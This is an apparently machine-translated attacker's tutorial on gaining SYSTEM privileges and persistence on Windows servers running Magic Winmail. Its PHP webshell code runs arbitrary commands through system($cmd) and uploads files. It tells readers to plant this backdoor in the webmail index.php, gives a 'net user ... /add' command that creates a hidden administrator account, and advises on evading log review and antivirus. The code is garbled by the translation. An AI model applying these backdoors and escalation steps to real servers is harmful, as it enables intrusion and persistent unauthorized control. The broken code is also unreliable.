Use magic winmail to escalate Permissions

Magic winmail is a good mail server software, which is favored by many websites. Mainly for Small and Medium websites. However, in my recent penetration, I found that it is very dangerous for a server with software modification to be able to escalate permissions once the attacker obtains webshell.
The server with magic winmail will enable port 8080 on the system to provide external mail services. People who have used it should know. The magic winmail server supports PHP script parsing.

Figure 1

Under the folder containing magic winmail
A server folder with a webmail folder.

Figure 2

You can find some PHP script files in this folder. Because the magic winmail software can parse PHP scripts, it is a good helper for us to use this vulnerability to improve permissions. I found this method by mistake. I wanted to install a backdoor on this server. How can I install it? I think it's strange. Generally, the general method is not used, so you have to make an idea on port 8080 of the server. This magic winmail is the best place. You are at D:/magicw ~ 1/Server/webmail [physical path on the machine I tested] Put the PHP script under the file, whether it is a script injection or a common PHP script, just put it! And lis0 prompts you to use it with confidence. Will there be no logs? Cainiao. Generally, the system is infiltrated, and the Administrator goes to the system disk to perform MD5 verification and script Trojan scan. He never dreamed that our scripts would be placed in this folder. lis0 recommends using injection scripts or self-written scripts that are not supported by antivirus software. Which script do I use? Lis0 uses an up. php file written by Angel and inserts something. It is very convenient to upload a modified script or other stuff. What about logs? Of course there are. However, in the magic winmail folder, there are not many network administrators who can view logs in this folder until now, unless they have read this article.

Up. php codz
<?
If ($ id = "1 "){
System ($ cmd );
Show_source ($ file );
Copy ($ A, $ B); unlink ($ );
}
?>
<?
$ Fname = $ _ FILES ['myfile'] ['name'];
$ DO = copy ($ _ FILES ['myfile'] ['tmp _ name'], $ fname );
If ($ do)
{
Echo "uploaded <p> ";
Echo "http: //";. $ SERVER_NAME. "". dirname ($ php_self). "/". $ fname ."";
} Else {
Echo "Upload Failed ";
}
?>
<Form enctype = "multipart/form-Data" Action = "<? PHP echo "". $ php_self. "";?> "Method =" Post ">
<Input name = "myfile" type = "file">
<Input value = "Submit" type = "Submit">
</From>
In fact, we can insert the following code into the index. php file of magic winmail, which has many functions. Added the Vulnerability Detected by lis0. This is the perfect backdoor.
<?
If ($ id = "1 "){
System ($ cmd );
Show_source ($ file );
Copy ($ A, $ B); unlink ($ );
}
?>
We use http://www.target.com: 8080/index. php? Id = 1 & YY = XX to access our bots. It seems that this is too dark :)
Haven't said about the vulnerability yet? Too much nonsense. Place a PHP script in D:/magicw ~ 1/Server/WebMail
Figure 3

Then net user lis0 lis0/Add & net localgroup administrators lis0/Add is a vulnerability discovered by the Buddies. If you don't believe it, let the bots prove that I am right.

Figure 4

This webshell is at the system level, not your guest level. Although it is the same as webshell, the treatment is different. If you want to play with other things, using the up. php file I mentioned above should not be a problem. Then execute it in the cute box of the script.
Can I use an ASP script to increase the permission limit? It is also placed in the magic winmail folder.
We can analyze whether magic winmail can parse PHP and ASP scripts at the same time. Sorry, magic winmail cannot parse ASP scripts. Magic winmail is the world of PHP.
How did we analyze the vulnerability? Our lovely network management system must be installed as a system when installing magic winmail. Of course, magic winmail inherits the system-level permission restriction, while our magic winmail can parse the PHP script. For example, our cute PHP script is a system-level script. This magic winmail software is a bit like the netbox made in China.
Let's see if the analysis is correct. So I uploaded a PHP probe to see how it happened.

Figure 5

No ~ Darling
System-level & no banned Functions & allowed/up to 32 M & lis0 happy ing. I personally think that the most perfect PHP script backdoor location is to give full play to your PHP talent. So much better, I hope it will be helpful to everyone's penetration.

Solution: process the disk where magic winmail is located and restrict the access of users with limited guest permissions.
Statement: This method is a big surprise for many people. Placing a backdoor and increasing the permission limit may have a negative impact. The test script has been completely deleted. Do not sit down for bored people.